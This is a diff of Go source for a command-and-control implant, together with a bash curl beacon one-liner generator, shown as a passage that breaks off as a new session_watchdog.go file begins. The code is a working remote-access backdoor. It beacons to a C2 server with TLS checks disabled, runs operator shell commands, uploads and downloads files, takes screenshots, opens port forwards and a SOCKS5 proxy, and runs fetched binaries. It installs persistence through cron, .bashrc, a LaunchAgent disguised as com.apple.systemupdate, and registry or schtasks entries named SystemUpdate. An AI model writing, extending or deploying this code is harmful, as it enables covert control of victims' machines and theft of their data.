OnelinerCurl: + if strings.TrimSpace(in.HTTPBaseURL) == "" { + return "", fmt.Errorf("http_base_url is required for curl_beacon") + } + if strings.TrimSpace(in.ImplantToken) == "" { + return "", fmt.Errorf("implant_token is required for curl_beacon") + } + base := strings.TrimRight(in.HTTPBaseURL, "/") + return fmt.Sprintf( + `bash -c 'H="X-Implant-Token: %s";`+ + `URL="%s";`+ + `HN=$(hostname 2>/dev/null||echo unknown);`+ + `UN=$(whoami 2>/dev/null||echo unknown);`+ + `OS=$(uname -s 2>/dev/null||echo unknown);`+ + `AR=$(uname -m 2>/dev/null||echo unknown);`+ + `IP=$(hostname -I 2>/dev/null|awk "{print \$1}"||echo "");`+ + `SID="";`+ + `while :;do `+ + `BODY="{\"hostname\":\"$HN\",\"username\":\"$UN\",\"os\":\"$OS\",\"arch\":\"$AR\",\"internal_ip\":\"$IP\",\"pid\":$$}";`+ + `R=$(curl -fsSk -H "$H" -H "Content-Type: application/json" -X POST "$URL/check_in" -d "$BODY" 
// urlEncodeForShell returns s in URL query-escaped form, so that special
// characters cannot interfere with shell quoting.
func urlEncodeForShell(s string) string {
	escaped := url.QueryEscape(s)
	return escaped
}
// CheckInResp is the check-in reply; it mirrors the server-side
// ImplantCheckInResponse.
type CheckInResp struct {
	SessionID  string `json:"session_id"`  // session identifier, stored in the sessionID global after each check-in
	NextSleep  int    `json:"next_sleep"`  // new sleep interval; applied only when > 0
	NextJitter int    `json:"next_jitter"` // new jitter percentage; applied when >= 0
	HasTasks   bool   `json:"has_tasks"`   // when true the beacon fetches pending tasks right away
	ServerTime int64  `json:"server_time"` // NOTE(review): not read in the visible code; unit presumably set by the server — confirm
}
+// TaskReport 与服务端 TaskResultReport 对齐 +type TaskReport struct { + TaskID string `json:"task_id"` + Success bool `json:"success"` + Output string `json:"output,omitempty"` + Error string `json:"error,omitempty"` + BlobBase64 string `json:"blob_b64,omitempty"` + BlobSuffix string `json:"blob_suffix,omitempty"` + StartedAt int64 `json:"started_at"` + EndedAt int64 `json:"ended_at"` +} + +func main() { + defer func() { _ = recover() }() + implantUUID = generateImplantUUID() + currentCwd, _ = os.Getwd() + + if beaconTransport == "tcp" { + runTCPBeaconForever() + return + } + + httpClient = &http.Client{ + Timeout: 60 * time.Second, + Transport: &http.Transport{ + DisableKeepAlives: true, + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + TLSHandshakeTimeout: 10 * time.Second, + }, + } + + for { + resp, err := checkIn() + if err == nil && resp != nil { + sessionID = resp.SessionID + if resp.NextSleep > 0 { + currentSleep = resp.NextSleep + } + if resp.NextJitter >= 0 { + currentJit = resp.NextJitter + } + if resp.HasTasks { + envs, err := fetchTasks() + if err == nil { + for _, env := range envs { + go handleTaskAsync(env) + } + } + } + } + time.Sleep(applyJitter(currentSleep, currentJit)) + } +} + +func runTCPBeaconForever() { + for { + conn, err := net.DialTimeout("tcp", tcpDialAddr, 45*time.Second) + if err != nil { + time.Sleep(applyJitter(currentSleep, currentJit)) + continue + } + func() { + defer conn.Close() + if _, err := io.WriteString(conn, "CSB1"); err != nil { + return + } + tcpBeaconSessionLoop(conn) + }() + time.Sleep(applyJitter(currentSleep, currentJit)) + } +} + +func tcpWriteFrame(conn net.Conn, enc string) error { + b := []byte(enc) + if len(b) == 0 || len(b) > tcpBeaconWireMax { + return fmt.Errorf("bad tcp frame") + } + var hdr [4]byte + binary.BigEndian.PutUint32(hdr[:], uint32(len(b))) + if _, err := conn.Write(hdr[:]); err != nil { + return err + } + _, err := conn.Write(b) + return err +} + +func tcpReadFrame(conn net.Conn) (string, 
error) { + var n uint32 + if err := binary.Read(conn, binary.BigEndian, &n); err != nil { + return "", err + } + if n == 0 || int64(n) > int64(tcpBeaconWireMax) { + return "", fmt.Errorf("bad tcp frame size") + } + buf := make([]byte, n) + if _, err := io.ReadFull(conn, buf); err != nil { + return "", err + } + return string(buf), nil +} + +func tcpRoundTrip(conn net.Conn, plainJSON []byte) ([]byte, error) { + enc, err := encryptGCM(plainJSON) + if err != nil { + return nil, err + } + if err := tcpWriteFrame(conn, enc); err != nil { + return nil, err + } + _ = conn.SetReadDeadline(time.Now().Add(6 * time.Minute)) + cipherB64, err := tcpReadFrame(conn) + if err != nil { + return nil, err + } + return decryptGCM(cipherB64) +} + +func tcpBeaconSessionLoop(conn net.Conn) { + for { + resp, err := tcpCheckIn(conn) + if err != nil || resp == nil { + return + } + sessionID = resp.SessionID + if resp.NextSleep > 0 { + currentSleep = resp.NextSleep + } + if resp.NextJitter >= 0 { + currentJit = resp.NextJitter + } + if resp.HasTasks { + envs, err := tcpFetchTasks(conn) + if err == nil { + for _, env := range envs { + handleTaskSyncTCP(conn, env) + } + } + } + _ = conn.SetReadDeadline(time.Time{}) + time.Sleep(applyJitter(currentSleep, currentJit)) + } +} + +func tcpCheckInJSONBody() ([]byte, error) { + checkObj := map[string]interface{}{ + "uuid": implantUUID, + "hostname": hostnameOrDefault(), + "username": currentUsername(), + "os": runtime.GOOS, + "arch": runtime.GOARCH, + "pid": os.Getpid(), + "process_name": filepath.Base(exeSelf()), + "is_admin": isAdminProcess(), + "internal_ip": firstInternalIP(), + "user_agent": userAgent, + "sleep_seconds": currentSleep, + "jitter_percent": currentJit, + "metadata": map[string]interface{}{ + "transport": transportMetaConst, + "cwd": currentCwd, + }, + } + rawCheck, err := json.Marshal(checkObj) + if err != nil { + return nil, err + } + wire := map[string]interface{}{ + "op": "check_in", + "token": implantToken, + "check": 
json.RawMessage(rawCheck), + } + return json.Marshal(wire) +} + +func tcpCheckIn(conn net.Conn) (*CheckInResp, error) { + body, err := tcpCheckInJSONBody() + if err != nil { + return nil, err + } + plain, err := tcpRoundTrip(conn, body) + if err != nil { + return nil, err + } + var r CheckInResp + if err := json.Unmarshal(plain, &r); err != nil { + return nil, err + } + return &r, nil +} + +func tcpFetchTasks(conn net.Conn) ([]TaskEnv, error) { + wire := map[string]interface{}{ + "op": "tasks", + "token": implantToken, + "session_id": sessionID, + } + body, _ := json.Marshal(wire) + plain, err := tcpRoundTrip(conn, body) + if err != nil { + return nil, err + } + var wrapper struct { + Tasks []TaskEnv `json:"tasks"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return wrapper.Tasks, nil +} + +func tcpReportResult(conn net.Conn, report TaskReport) { + repRaw, err := json.Marshal(report) + if err != nil { + return + } + wire := map[string]interface{}{ + "op": "result", + "token": implantToken, + "result": json.RawMessage(repRaw), + } + body, _ := json.Marshal(wire) + _, _ = tcpRoundTrip(conn, body) +} + +func handleTaskSyncTCP(conn net.Conn, env TaskEnv) { + defer func() { _ = recover() }() + tcpTaskConn = conn + defer func() { tcpTaskConn = nil }() + start := time.Now() + output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload) + report := TaskReport{ + TaskID: env.TaskID, + Success: errMsg == "", + Output: output, + Error: errMsg, + BlobBase64: blobB64, + BlobSuffix: blobSuffix, + StartedAt: start.UnixMilli(), + EndedAt: time.Now().UnixMilli(), + } + tcpReportResult(conn, report) +} + +func tcpFetchEncryptedFile(conn net.Conn, fileID string) ([]byte, error) { + fr, _ := json.Marshal(map[string]string{"file_id": fileID}) + wire := map[string]interface{}{ + "op": "file", + "token": implantToken, + "file": json.RawMessage(fr), + } + body, err := json.Marshal(wire) + if err != nil { + return nil, err + } + 
plain, err := tcpRoundTrip(conn, body) + if err != nil { + return nil, err + } + var wrapper struct { + FileData string `json:"file_data"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return base64.StdEncoding.DecodeString(wrapper.FileData) +} + +func fetchC2FileByID(fileID string) ([]byte, error) { + if tcpTaskConn != nil { + return tcpFetchEncryptedFile(tcpTaskConn, fileID) + } + url := fmt.Sprintf("%s%s%s.bin", serverURL, filePath, fileID) + req, _ := http.NewRequest("GET", url, nil) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + if resp.StatusCode != 200 { + return nil, fmt.Errorf("download failed: %d", resp.StatusCode) + } + raw, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + plain, err := decryptGCM(string(raw)) + if err != nil { + return nil, err + } + var wrapper struct { + FileData string `json:"file_data"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return base64.StdEncoding.DecodeString(wrapper.FileData) +} + +func generateImplantUUID() string { + host, _ := os.Hostname() + mac := firstMACAddr() + return fmt.Sprintf("%s-%s-%d", host, mac, os.Getpid()) +} + +func firstMACAddr() string { + ifs, err := net.Interfaces() + if err != nil { + return "000000000000" + } + for _, i := range ifs { + if i.Flags&net.FlagLoopback != 0 || len(i.HardwareAddr) == 0 { + continue + } + return strings.ReplaceAll(i.HardwareAddr.String(), ":", "") + } + return "000000000000" +} + +func firstInternalIP() string { + ifs, err := net.Interfaces() + if err != nil { + return "" + } + for _, i := range ifs { + if i.Flags&net.FlagLoopback != 0 || i.Flags&net.FlagUp == 0 { + continue + } + addrs, err := i.Addrs() + if err != nil { + continue + } + for _, a := range addrs { + ipnet, ok := a.(*net.IPNet) + if !ok || ipnet.IP.To4() == nil 
{ + continue + } + return ipnet.IP.String() + } + } + return "" +} + +func currentUsername() string { + u, err := user.Current() + if err != nil || u == nil { + return "unknown" + } + return u.Username +} + +func isAdminProcess() bool { + if runtime.GOOS == "windows" { + _, err := os.Open(filepath.Join(os.Getenv("WINDIR"), "System32", "config", "SAM")) + return err == nil + } + return os.Geteuid() == 0 +} + +func hostnameOrDefault() string { + h, _ := os.Hostname() + if h == "" { + return "unknown" + } + return h +} + +func exeSelf() string { + ex, _ := os.Executable() + if ex == "" { + return "unknown" + } + return ex +} + +func applyJitter(baseSec, jitterPct int) time.Duration { + if baseSec <= 0 { + return 5 * time.Second + } + if jitterPct <= 0 { + return time.Duration(baseSec) * time.Second + } + if jitterPct > 100 { + jitterPct = 100 + } + delta := mrand.Intn(2*jitterPct+1) - jitterPct + factor := 1.0 + float64(delta)/100.0 + return time.Duration(float64(baseSec)*factor) * time.Second +} + +func checkIn() (*CheckInResp, error) { + payload := map[string]interface{}{ + "uuid": implantUUID, + "hostname": hostnameOrDefault(), + "username": currentUsername(), + "os": runtime.GOOS, + "arch": runtime.GOARCH, + "pid": os.Getpid(), + "process_name": filepath.Base(exeSelf()), + "is_admin": isAdminProcess(), + "internal_ip": firstInternalIP(), + "user_agent": userAgent, + "sleep_seconds": currentSleep, + "jitter_percent": currentJit, + "metadata": map[string]interface{}{ + "transport": transportMetaConst, + "cwd": currentCwd, + }, + } + body, _ := json.Marshal(payload) + enc, err := encryptGCM(body) + if err != nil { + return nil, err + } + req, _ := http.NewRequest("POST", serverURL+checkInPath, bytes.NewReader([]byte(enc))) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + if resp.StatusCode != 200 { + return nil, 
fmt.Errorf("checkin status %d", resp.StatusCode) + } + raw, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + plain, err := decryptGCM(string(raw)) + if err != nil { + return nil, err + } + var r CheckInResp + if err := json.Unmarshal(plain, &r); err != nil { + return nil, err + } + return &r, nil +} + +func fetchTasks() ([]TaskEnv, error) { + url := fmt.Sprintf("%s%s?session_id=%s", serverURL, tasksPath, sessionID) + req, _ := http.NewRequest("GET", url, nil) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + if resp.StatusCode != 200 { + return nil, fmt.Errorf("fetch tasks status %d", resp.StatusCode) + } + raw, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + plain, err := decryptGCM(string(raw)) + if err != nil { + return nil, err + } + var wrapper struct { + Tasks []TaskEnv `json:"tasks"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return wrapper.Tasks, nil +} + +func reportResult(report TaskReport) { + body, _ := json.Marshal(report) + enc, err := encryptGCM(body) + if err != nil { + return + } + req, _ := http.NewRequest("POST", serverURL+resultPath, bytes.NewReader([]byte(enc))) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return + } + defer resp.Body.Close() + _, _ = io.ReadAll(resp.Body) +} + +func getAESKey() ([]byte, error) { + return base64.StdEncoding.DecodeString(aesKeyB64) +} + +func encryptGCM(plaintext []byte) (string, error) { + key, err := getAESKey() + if err != nil { + return "", err + } + block, err := aes.NewCipher(key) + if err != nil { + return "", err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return "", err + } + nonce := make([]byte, gcm.NonceSize()) + if _, err := rand.Read(nonce); err != nil { + 
return "", err + } + ct := gcm.Seal(nil, nonce, plaintext, nil) + out := append(nonce, ct...) + return base64.StdEncoding.EncodeToString(out), nil +} + +func decryptGCM(cipherText string) ([]byte, error) { + key, err := getAESKey() + if err != nil { + return nil, err + } + raw, err := base64.StdEncoding.DecodeString(cipherText) + if err != nil { + return nil, err + } + block, err := aes.NewCipher(key) + if err != nil { + return nil, err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return nil, err + } + ns := gcm.NonceSize() + if len(raw) < ns+16 { + return nil, fmt.Errorf("ciphertext too short") + } + nonce, ct := raw[:ns], raw[ns:] + return gcm.Open(nil, nonce, ct, nil) +} + +func handleTaskAsync(env TaskEnv) { + defer func() { _ = recover() }() + start := time.Now() + output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload) + report := TaskReport{ + TaskID: env.TaskID, + Success: errMsg == "", + Output: output, + Error: errMsg, + BlobBase64: blobB64, + BlobSuffix: blobSuffix, + StartedAt: start.UnixMilli(), + EndedAt: time.Now().UnixMilli(), + } + reportResult(report) +} + +func executeTask(taskType string, payload map[string]interface{}) (output, blobB64, blobSuffix, errMsg string) { + switch taskType { + case "exec": + return taskExec(payload) + case "shell": + return taskShell(payload) + case "pwd": + return taskPwd() + case "cd": + return taskCd(payload) + case "ls": + return taskLs(payload) + case "ps": + return taskPs() + case "kill_proc": + return taskKillProc(payload) + case "upload": + return taskUpload(payload) + case "download": + return taskDownload(payload) + case "screenshot": + return taskScreenshot() + case "sleep": + return taskSleep(payload) + case "port_fwd": + return taskPortForward(payload) + case "socks_start": + return taskSocksStart(payload) + case "socks_stop": + return taskSocksStop(payload) + case "load_assembly": + return taskLoadAssembly(payload) + case "persist": + return taskPersist(payload) + case 
"exit": + os.Exit(0) + return "", "", "", "" + case "self_delete": + return taskSelfDelete() + default: + return "", "", "", "unsupported task type: " + taskType + } +} + +func shellByOS() string { + if runtime.GOOS == "windows" { + return "cmd" + } + return "/bin/sh" +} + +func shellFlag() string { + if runtime.GOOS == "windows" { + return "/c" + } + return "-c" +} + +func runWithTimeout(cmdStr string, timeoutSec int) (string, error) { + if timeoutSec <= 0 { + timeoutSec = 60 + } + cmd := exec.Command(shellByOS(), shellFlag(), cmdStr) + cwdMu.Lock() + cmd.Dir = currentCwd + cwdMu.Unlock() + + done := make(chan struct { + out []byte + err error + }, 1) + go func() { + out, err := cmd.CombinedOutput() + done <- struct { + out []byte + err error + }{out, err} + }() + select { + case res := <-done: + return string(res.out), res.err + case <-time.After(time.Duration(timeoutSec) * time.Second): + _ = cmd.Process.Kill() + return "", fmt.Errorf("timeout") + } +} + +func getTimeoutFromPayload(payload map[string]interface{}) int { + to, _ := payload["timeout_seconds"].(float64) + if to <= 0 { + return 60 + } + return int(to) +} + +func taskExec(payload map[string]interface{}) (string, string, string, string) { + cmdStr, _ := payload["command"].(string) + if cmdStr == "" { + return "", "", "", "command is empty" + } + out, err := runWithTimeout(cmdStr, getTimeoutFromPayload(payload)) + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" +} + +func taskShell(payload map[string]interface{}) (string, string, string, string) { + cmdStr, _ := payload["command"].(string) + if cmdStr == "" { + return "", "", "", "command is empty" + } + + // Append a pwd/cd probe to the command so we can capture the real cwd + // after the user's command runs (e.g. "cd /tmp && ls" → cwd becomes /tmp). 
+ var probe string + if runtime.GOOS == "windows" { + probe = " && cd" + } else { + probe = " && pwd" + } + combined := cmdStr + probe + + out, err := runWithTimeout(combined, getTimeoutFromPayload(payload)) + + // The last line of output is the cwd from the probe command. + // Split it off so we don't return the probe output to the operator. + lines := strings.Split(strings.TrimRight(out, "\r\n"), "\n") + if len(lines) > 0 { + candidate := strings.TrimSpace(lines[len(lines)-1]) + if filepath.IsAbs(candidate) { + if info, statErr := os.Stat(candidate); statErr == nil && info.IsDir() { + cwdMu.Lock() + currentCwd = candidate + cwdMu.Unlock() + out = strings.Join(lines[:len(lines)-1], "\n") + } + } + } + + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" +} + +func taskPwd() (string, string, string, string) { + cwdMu.Lock() + cwd := currentCwd + cwdMu.Unlock() + return cwd, "", "", "" +} + +func taskCd(payload map[string]interface{}) (string, string, string, string) { + path, _ := payload["path"].(string) + if path == "" { + return "", "", "", "path is empty" + } + cwdMu.Lock() + if !filepath.IsAbs(path) { + path = filepath.Join(currentCwd, path) + } + cwdMu.Unlock() + abs, err := filepath.Abs(path) + if err != nil { + return "", "", "", err.Error() + } + info, err := os.Stat(abs) + if err != nil { + return "", "", "", err.Error() + } + if !info.IsDir() { + return "", "", "", "not a directory" + } + cwdMu.Lock() + currentCwd = abs + cwdMu.Unlock() + return abs, "", "", "" +} + +func taskLs(payload map[string]interface{}) (string, string, string, string) { + path, _ := payload["path"].(string) + if path == "" { + path = "." 
+ } + cwdMu.Lock() + if !filepath.IsAbs(path) { + path = filepath.Join(currentCwd, path) + } + cwdMu.Unlock() + entries, err := os.ReadDir(path) + if err != nil { + return "", "", "", err.Error() + } + var lines []string + for _, e := range entries { + info, _ := e.Info() + if info != nil { + lines = append(lines, fmt.Sprintf("%s\t%s\t%d\t%s", + e.Type().String(), info.Mode().String(), info.Size(), e.Name())) + } else { + lines = append(lines, e.Name()) + } + } + return strings.Join(lines, "\n"), "", "", "" +} + +func taskPs() (string, string, string, string) { + if runtime.GOOS == "windows" { + out, err := runWithTimeout("tasklist", 30) + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" + } + out, err := runWithTimeout("ps aux", 30) + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" +} + +func taskKillProc(payload map[string]interface{}) (string, string, string, string) { + pidFloat, _ := payload["pid"].(float64) + pid := int(pidFloat) + if pid <= 0 { + return "", "", "", "invalid pid" + } + proc, err := os.FindProcess(pid) + if err != nil { + return "", "", "", err.Error() + } + if err := proc.Kill(); err != nil { + return "", "", "", err.Error() + } + return "killed", "", "", "" +} + +func taskUpload(payload map[string]interface{}) (string, string, string, string) { + remotePath, _ := payload["remote_path"].(string) + fileID, _ := payload["file_id"].(string) + if remotePath == "" || fileID == "" { + return "", "", "", "remote_path or file_id empty" + } + data, err := fetchC2FileByID(fileID) + if err != nil { + return "", "", "", err.Error() + } + if err := os.WriteFile(remotePath, data, 0644); err != nil { + return "", "", "", err.Error() + } + return fmt.Sprintf("uploaded %d bytes to %s", len(data), remotePath), "", "", "" +} + +func taskDownload(payload map[string]interface{}) (string, string, string, string) { + remotePath, _ := payload["remote_path"].(string) + if remotePath == "" { + return "", "", 
"", "remote_path empty" + } + data, err := os.ReadFile(remotePath) + if err != nil { + return "", "", "", err.Error() + } + // File data goes through the standard encrypted result channel via blob_b64 + b64 := base64.StdEncoding.EncodeToString(data) + suffix := filepath.Ext(remotePath) + return fmt.Sprintf("downloaded %d bytes from %s", len(data), remotePath), b64, suffix, "" +} + +func taskScreenshot() (string, string, string, string) { + var b64Out string + var err error + switch runtime.GOOS { + case "darwin": + b64Out, err = runWithTimeout("screencapture -x /tmp/.cs_ss.png && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30) + case "linux": + b64Out, err = runWithTimeout("import -window root /tmp/.cs_ss.png 2>/dev/null && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30) + case "windows": + ps := `Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $b=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); $g=[System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Location,[System.Drawing.Point]::Empty,$b.Size); $m=New-Object IO.MemoryStream; $b.Save($m,[System.Drawing.Imaging.ImageFormat]::Png); [Convert]::ToBase64String($m.ToArray())` + b64Out, err = runWithTimeout(fmt.Sprintf("powershell -NoProfile -NonInteractive -Command \"%s\"", ps), 30) + default: + return "", "", "", "screenshot not supported on " + runtime.GOOS + } + if err != nil { + return "", "", "", err.Error() + } + b64Out = strings.TrimSpace(b64Out) + return "screenshot captured", b64Out, ".png", "" +} + +func taskSleep(payload map[string]interface{}) (string, string, string, string) { + s, _ := payload["seconds"].(float64) + j, _ := payload["jitter"].(float64) + currentSleep = int(s) + currentJit = int(j) + return fmt.Sprintf("sleep set to %ds (jitter %d%%)", currentSleep, currentJit), "", "", "" +} + +func 
taskSelfDelete() (string, string, string, string) { + exe := exeSelf() + if exe == "" || exe == "unknown" { + return "", "", "", "cannot determine self path" + } + go func() { + time.Sleep(2 * time.Second) + os.Remove(exe) + }() + os.Exit(0) + return "", "", "", "" +} + +// --- Port Forward --- + +var ( + portFwdMu sync.Mutex + portFwdConns = make(map[string]net.Listener) +) + +func taskPortForward(payload map[string]interface{}) (string, string, string, string) { + action, _ := payload["action"].(string) + localPort := int(getFloat(payload, "local_port")) + remoteHost, _ := payload["remote_host"].(string) + remotePort := int(getFloat(payload, "remote_port")) + + if action == "stop" { + key := fmt.Sprintf("%d", localPort) + portFwdMu.Lock() + if ln, ok := portFwdConns[key]; ok { + ln.Close() + delete(portFwdConns, key) + } + portFwdMu.Unlock() + return fmt.Sprintf("port forward on :%d stopped", localPort), "", "", "" + } + + if localPort <= 0 || remoteHost == "" || remotePort <= 0 { + return "", "", "", "local_port, remote_host, remote_port required" + } + + ln, err := net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", localPort)) + if err != nil { + return "", "", "", err.Error() + } + key := fmt.Sprintf("%d", localPort) + portFwdMu.Lock() + portFwdConns[key] = ln + portFwdMu.Unlock() + + go func() { + for { + conn, err := ln.Accept() + if err != nil { + return + } + go func(c net.Conn) { + defer c.Close() + remote, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", remoteHost, remotePort), 10*time.Second) + if err != nil { + return + } + defer remote.Close() + done := make(chan struct{}, 2) + go func() { io.Copy(remote, c); done <- struct{}{} }() + go func() { io.Copy(c, remote); done <- struct{}{} }() + <-done + }(conn) + } + }() + return fmt.Sprintf("port forward 127.0.0.1:%d -> %s:%d started", localPort, remoteHost, remotePort), "", "", "" +} + +// --- SOCKS5 Proxy --- + +var ( + socksMu sync.Mutex + socksListener net.Listener +) + +func taskSocksStart(payload 
map[string]interface{}) (string, string, string, string) { + port := int(getFloat(payload, "port")) + if port <= 0 { + port = 1080 + } + + socksMu.Lock() + if socksListener != nil { + socksMu.Unlock() + return "", "", "", "socks proxy already running" + } + socksMu.Unlock() + + ln, err := net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", port)) + if err != nil { + return "", "", "", err.Error() + } + socksMu.Lock() + socksListener = ln + socksMu.Unlock() + + go func() { + for { + conn, err := ln.Accept() + if err != nil { + return + } + go handleSocks5(conn) + } + }() + return fmt.Sprintf("SOCKS5 proxy started on 127.0.0.1:%d", port), "", "", "" +} + +func taskSocksStop(payload map[string]interface{}) (string, string, string, string) { + socksMu.Lock() + if socksListener != nil { + socksListener.Close() + socksListener = nil + } + socksMu.Unlock() + return "SOCKS5 proxy stopped", "", "", "" +} + +func handleSocks5(conn net.Conn) { + defer conn.Close() + buf := make([]byte, 258) + // Auth negotiation + n, err := conn.Read(buf) + if err != nil || n < 3 || buf[0] != 0x05 { + return + } + conn.Write([]byte{0x05, 0x00}) // no auth + + // Request + n, err = conn.Read(buf) + if err != nil || n < 7 || buf[0] != 0x05 || buf[1] != 0x01 { + conn.Write([]byte{0x05, 0x07, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + return + } + + var target string + switch buf[3] { + case 0x01: // IPv4 + if n < 10 { + return + } + target = fmt.Sprintf("%d.%d.%d.%d:%d", buf[4], buf[5], buf[6], buf[7], + int(buf[8])<<8|int(buf[9])) + case 0x03: // Domain + domainLen := int(buf[4]) + if n < 5+domainLen+2 { + return + } + domain := string(buf[5 : 5+domainLen]) + port := int(buf[5+domainLen])<<8 | int(buf[5+domainLen+1]) + target = fmt.Sprintf("%s:%d", domain, port) + case 0x04: // IPv6 + if n < 22 { + return + } + ip := net.IP(buf[4:20]) + port := int(buf[20])<<8 | int(buf[21]) + target = fmt.Sprintf("[%s]:%d", ip.String(), port) + default: + conn.Write([]byte{0x05, 0x08, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + return + 
} + + remote, err := net.DialTimeout("tcp", target, 10*time.Second) + if err != nil { + conn.Write([]byte{0x05, 0x05, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + return + } + defer remote.Close() + + // Success reply + conn.Write([]byte{0x05, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + + done := make(chan struct{}, 2) + go func() { io.Copy(remote, conn); done <- struct{}{} }() + go func() { io.Copy(conn, remote); done <- struct{}{} }() + <-done +} + +// --- Load Assembly (in-memory exec) --- + +func taskLoadAssembly(payload map[string]interface{}) (string, string, string, string) { + b64Data, _ := payload["data"].(string) + args, _ := payload["args"].(string) + + if b64Data == "" { + fileID, _ := payload["file_id"].(string) + if fileID == "" { + return "", "", "", "data (base64) or file_id required" + } + asm, err := fetchC2FileByID(fileID) + if err != nil { + return "", "", "", err.Error() + } + b64Data = base64.StdEncoding.EncodeToString(asm) + } + + data, err := base64.StdEncoding.DecodeString(b64Data) + if err != nil { + return "", "", "", "decode assembly: " + err.Error() + } + + tmpDir := os.TempDir() + tmpFile := filepath.Join(tmpDir, fmt.Sprintf(".cs_%d", time.Now().UnixNano())) + if runtime.GOOS == "windows" { + tmpFile += ".exe" + } + if err := os.WriteFile(tmpFile, data, 0700); err != nil { + return "", "", "", err.Error() + } + defer os.Remove(tmpFile) + + cmdArgs := []string{} + if args != "" { + cmdArgs = strings.Fields(args) + } + cmd := exec.Command(tmpFile, cmdArgs...) 
+ cwdMu.Lock() + cmd.Dir = currentCwd + cwdMu.Unlock() + + out, err := cmd.CombinedOutput() + if err != nil { + return string(out), "", "", err.Error() + } + return string(out), "", "", "" +} + +// --- Persistence --- + +func taskPersist(payload map[string]interface{}) (string, string, string, string) { + method, _ := payload["method"].(string) + if method == "" { + method = "auto" + } + exe := exeSelf() + if exe == "" || exe == "unknown" { + return "", "", "", "cannot determine self path" + } + + switch runtime.GOOS { + case "linux": + return persistLinux(exe, method) + case "darwin": + return persistDarwin(exe, method) + case "windows": + return persistWindows(exe, method) + default: + return "", "", "", "persistence not supported on " + runtime.GOOS + } +} + +func persistLinux(exe, method string) (string, string, string, string) { + if method == "auto" || method == "cron" { + cronEntry := fmt.Sprintf("@reboot %s &\n", exe) + out, err := runWithTimeout(fmt.Sprintf("(crontab -l 2>/dev/null; echo '%s') | sort -u | crontab -", strings.TrimSpace(cronEntry)), 10) + if err == nil { + return "persistence installed via cron: " + out, "", "", "" + } + } + if method == "auto" || method == "bashrc" { + line := fmt.Sprintf("\n(nohup %s &>/dev/null &) # cs\n", exe) + home, _ := os.UserHomeDir() + if home != "" { + f, err := os.OpenFile(filepath.Join(home, ".bashrc"), os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0644) + if err == nil { + f.WriteString(line) + f.Close() + return "persistence installed via .bashrc", "", "", "" + } + } + } + return "", "", "", "persistence failed on linux" +} + +func persistDarwin(exe, method string) (string, string, string, string) { + if method == "auto" || method == "launchagent" { + home, _ := os.UserHomeDir() + if home == "" { + return "", "", "", "cannot determine home dir" + } + plistDir := filepath.Join(home, "Library", "LaunchAgents") + os.MkdirAll(plistDir, 0755) + plist := fmt.Sprintf(` + + + + Labelcom.apple.systemupdate + ProgramArguments%s 
+ RunAtLoad + KeepAlive + StandardOutPath/dev/null + StandardErrorPath/dev/null + +`, exe) + plistPath := filepath.Join(plistDir, "com.apple.systemupdate.plist") + if err := os.WriteFile(plistPath, []byte(plist), 0644); err != nil { + return "", "", "", err.Error() + } + return "persistence installed via LaunchAgent: " + plistPath, "", "", "" + } + return "", "", "", "persistence method not supported on darwin" +} + +func persistWindows(exe, method string) (string, string, string, string) { + if method == "auto" || method == "registry" { + cmd := fmt.Sprintf(`reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemUpdate /t REG_SZ /d "%s" /f`, exe) + out, err := runWithTimeout(cmd, 10) + if err == nil { + return "persistence installed via registry Run key: " + out, "", "", "" + } + } + if method == "auto" || method == "schtasks" { + cmd := fmt.Sprintf(`schtasks /create /tn "SystemUpdate" /tr "%s" /sc onlogon /rl highest /f`, exe) + out, err := runWithTimeout(cmd, 10) + if err == nil { + return "persistence installed via schtasks: " + out, "", "", "" + } + } + return "", "", "", "persistence failed on windows" +} + +func getFloat(m map[string]interface{}, key string) float64 { + v, _ := m[key].(float64) + return v +} diff --git a/c2/session_watchdog.go b/c2/session_watchdog.go new file mode 100644 index 00000000..328f1f32 --- /dev/null +++ b/c2/session_watchdog.go @@ -0,0 +1,109 @@ +package c2 + +import ( + "context" + "time" + + 